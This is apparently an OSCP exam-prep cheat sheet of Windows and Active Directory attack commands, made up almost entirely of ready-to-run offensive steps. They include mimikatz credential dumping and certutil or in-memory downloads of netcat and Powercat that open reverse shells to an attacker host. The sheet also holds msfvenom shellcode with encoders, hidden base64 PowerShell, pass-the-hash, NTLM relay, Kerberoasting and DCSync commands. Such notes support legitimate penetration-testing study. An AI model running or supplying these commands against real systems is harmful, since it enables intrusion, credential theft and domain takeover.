
OSCP Windows Commands Cheat Sheet

Bloodhound

Shortest Path to Domain Admins

MATCH p=shortestPath((n)-[:Owns|GenericAll|GenericWrite|WriteOwner|WriteDacl|MemberOf|ForceChangePassword|AllExtendedRights|AddMember|HasSession|Contains|GPLink|AllowedToDelegate|TrustedBy|AllowedToAct|AdminTo|CanPSRemote|CanRDP|ExecuteDCOM|HasSIDHistory|AddSelf|DCSync|ReadLAPSPassword|ReadGMSAPassword|DumpSMSAPassword|SQLAdmin|AddAllowedToAct|WriteSPN|AddKeyCredentialLink|SyncLAPSPassword|WriteAccountRestrictions|GoldenCert|ADCSESC1|ADCSESC3|ADCSESC4|ADCSESC5|ADCSESC6a|ADCSESC6b|ADCSESC7|ADCSESC9a|ADCSESC9b|ADCSESC10a|ADCSESC10b|ADCSESC13|DCFor*1..]->(g:Group)) WHERE g.objectid ENDS WITH "-512" AND n<>g RETURN p

mimikatz

.\mimikatz

privilege::debug
token::elevate

"sekurlsa::logonpasswords" exit

lsadump::lsa

lsadump::sam

lsadump::secrets

sekurlsa::logonpasswords

lsadump::cache

To Find SAM and SYSTEM files from the Backup

Get-ChildItem -Path . -Recurse -Filter *system* -File
Get-ChildItem -Path . -Recurse -Filter *sam* -File

To Enable RDP on the Machine:

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

Sharing files to and from Windows

On Kali Linux

impacket-smbserver share $(pwd) -smb2support -user offsec -password lab

On Machine

net use \\<HOST_IP>\share lab /user:offsec

or

$pass = ConvertTo-SecureString 'lab' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('offsec', $pass)
New-PSDrive -Name share -PSProvider FileSystem -Credential $cred -Root \\<HOST_IP>\share

PowerShell

To check whether a user exists locally on the system

Get-LocalUser

Properties of a User

net user paul

To get Account Policy

net accounts

Check Local Administrators

net localgroup administrators

Winpeas

cp /usr/share/peass/winpeas/winPEASx64.exe .
sudo python3 -m http.server 80

iwr -uri http://<LOCAL_IP>/winPEASx64.exe -Outfile winPEAS.exe

Check what services you can start

accesschk.exe /accepteula -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula

Reverse Shell

To Download Reverse shell

certutil -urlcache -f http://kali_ip/nc64.exe c:/windows/temp/nc64.exe

To run the Reverse shell

c:/windows/temp/nc64.exe -e powershell <HOST_IP> <HOST_PORT>

Generating Reverse Shell using msfvenom

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<HOST_IP> LPORT=443 -f exe -o rshell.exe

Alternatively we can do as follows:

msfvenom -p windows/shell_reverse_tcp LHOST=<HOST_IP> LPORT=443 EXITFUNC=thread -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"

PowerUp

cp /usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1 .

Downloading (serve it from Kali on port 80 as for winPEAS)

iwr -uri http://192.168.119.3/PowerUp.ps1 -Outfile PowerUp.ps1

Running the PowerUp

powershell -ep bypass
. .\PowerUp.ps1

Run all checks

Invoke-AllChecks

Get Service Binary Hijacking

Get-ModifiableServiceFile

DLL Hijacking: PowerUp does not enumerate service DLL hijacking for you; perform it manually

Get Unquoted Service Paths

Get-UnquotedService

Powercat

Powercat is a PowerShell implementation of Netcat (usually used to get reverse shells)

Copy Powercat to present directory:

cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .

Downloading and running the Powercat file in memory

IEX (New-Object System.Net.Webclient).DownloadString("http://<HOST_IP>/powercat.ps1");powercat -c <HOST_IP> -p <HOST_PORT> -e powershell

To run the Powercat download-and-execute one-liner above as a Base64-encoded payload

powershell.exe -nop -w hidden -e <Base64 encoded>

Powershell Reverse Shell - https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

For Reverse Shell - ASPX - https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/master/shell.aspx

To convert to Base64 using PowerShell (do not use CyberChef with its default settings: -EncodedCommand expects the command as UTF-16LE bytes, which is what the Unicode encoding below produces, not UTF-8)

$Text = "TEXT TO BE CONVERTED"
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText = [Convert]::ToBase64String($Bytes)
$EncodedText

Powerview - To Enumerate AD

Import PowerView

cp /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/powerview.ps1 .
powershell.exe -ep bypass
Import-Module .\PowerView.ps1

Get Current Domain

Get-NetDomain

List all users in the Domain

Get-NetUser

#To further filter for one specific field
Get-NetUser | select cn

List all Groups

Get-NetGroup

#List specific things
Get-NetGroup | select cn
Get-NetGroup "Sales Department" | select member

To get Computer Objects in the Domain

Get-NetComputer

#Filter 
Get-NetComputer | select operatingsystem,dnshostname

Scanning domain to find local administrative privileges for our user

Find-LocalAdminAccess

Check logged in users

Get-NetSession -ComputerName files04
Get-NetSession -ComputerName files04 -Verbose

Enumerating Service Accounts

setspn -L iis_service
Get-NetUser -SPN
#Filter for specifics
Get-NetUser -SPN | select samaccountname,serviceprincipalname

To get or enumerate Access Control Entries

Get-ObjectAcl

#For specific user 
Get-ObjectAcl -Identity stephanie

To convert the SID to Name we can use

Convert-SidToName <SID>

#Example
Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104

SecurityIdentifier - find out who has the ReadProperty permission

Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-553

Enumerating ACLs for Management Groups

Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

#Further we can convert these SIDs to names as above

To Find Domain Shares

Find-DomainShare

# Explore SYSVOL ->  %SystemRoot%\SYSVOL\Sysvol\domain-name

Impacket

Connecting to MSSQL Database

impacket-mssqlclient <USERNAME>:<PASSWORD>@<HOST_IP> -windows-auth

wmiexec gives a shell as the authenticating user (e.g. Administrator); psexec always gives a shell as SYSTEM instead of that user

Impacket psexec using Password Hash (pass-the-hash; the LM half is left as zeros)

impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212

Wmiexec

impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212

NTLM Relay Attack

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc <Base64 encoded reverse shell one-liner>"

AS-REP Roasting

impacket-GetNPUsers -dc-ip <DC_IP> -request -outputfile hashes.asreproast <domain>/<user>

Kerberoasting

sudo impacket-GetUserSPNs -request -dc-ip <DC_IP> <domain>/<user>

DC Sync attack

impacket-secretsdump -just-dc-user <randomuser> <domain>/<domainadmin>:<password>@192.168.50.70

Other Tips

If you opened PowerShell via runas, the process still runs with a filtered token; start an elevated PowerShell to actually use the admin rights:

Start-Process powershell.exe -Verb runAs

nc.exe

find / -name nc.exe 2>/dev/null

Get Token Integrity Level (Medium = not elevated, High = elevated admin, System = NT AUTHORITY\SYSTEM)

powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel
Medium (example output)

Potato Exploits - Using Exploits

Windows PE - https://github.com/gtworek/Priv2Admin

AD PE - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse

Kerberos Cheat sheet - https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

Windows Kernel Exploits - https://github.com/SecWiki/windows-kernel-exploits